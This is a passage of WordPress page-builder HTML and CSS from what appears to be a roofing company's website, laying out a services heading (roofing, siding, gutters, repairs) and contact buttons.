976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"781513a3-174d-4594-86c8-5daf7f32af16\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-781513a3-174d-4594-86c8-5daf7f32af16 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"fead57cb-9c5c-411a-bb72-20bd150b5268\"} -->\n<style type=\"text/css\"> .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-fead57cb-9c5c-411a-bb72-20bd150b5268 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"57952f87-1484-4ebd-851f-822a3d450cc3\"} -->\n<style type=\"text/css\"> .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-57952f87-1484-4ebd-851f-822a3d450cc3\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b7d6108a-a14d-4498-85a9-8c42833b5557\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b7d6108a-a14d-4498-85a9-8c42833b5557 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b7d6108a-a14d-4498-85a9-8c42833b5557\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Roofing, Siding, Gutters, Repairs</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"63ddace3-1c17-4204-b706-d0b433daef69\"} -->\n<style type=\"text/css\"> .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-63ddace3-1c17-4204-b706-d0b433daef69 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-63ddace3-1c17-4204-b706-d0b433daef69\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"3d60bfc1-b9eb-4ec8-9435-1256841854bd\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3d60bfc1-b9eb-4ec8-9435-1256841854bd skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"056cb894-6454-42df-942f-dfc188516e3c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-056cb894-6454-42df-942f-dfc188516e3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-056cb894-6454-42df-942f-dfc188516e3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-056cb894-6454-42df-942f-dfc188516e3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-056cb894-6454-42df-942f-dfc188516e3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"50e69a29-82aa-4d9a-8393-5d7206f14a34\"} -->\n<style type=\"text/css\"> .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-50e69a29-82aa-4d9a-8393-5d7206f14a34 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-50e69a29-82aa-4d9a-8393-5d7206f14a34 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"8084ee78-5871-48ad-a7a9-1e3b52164921\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8084ee78-5871-48ad-a7a9-1e3b52164921 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 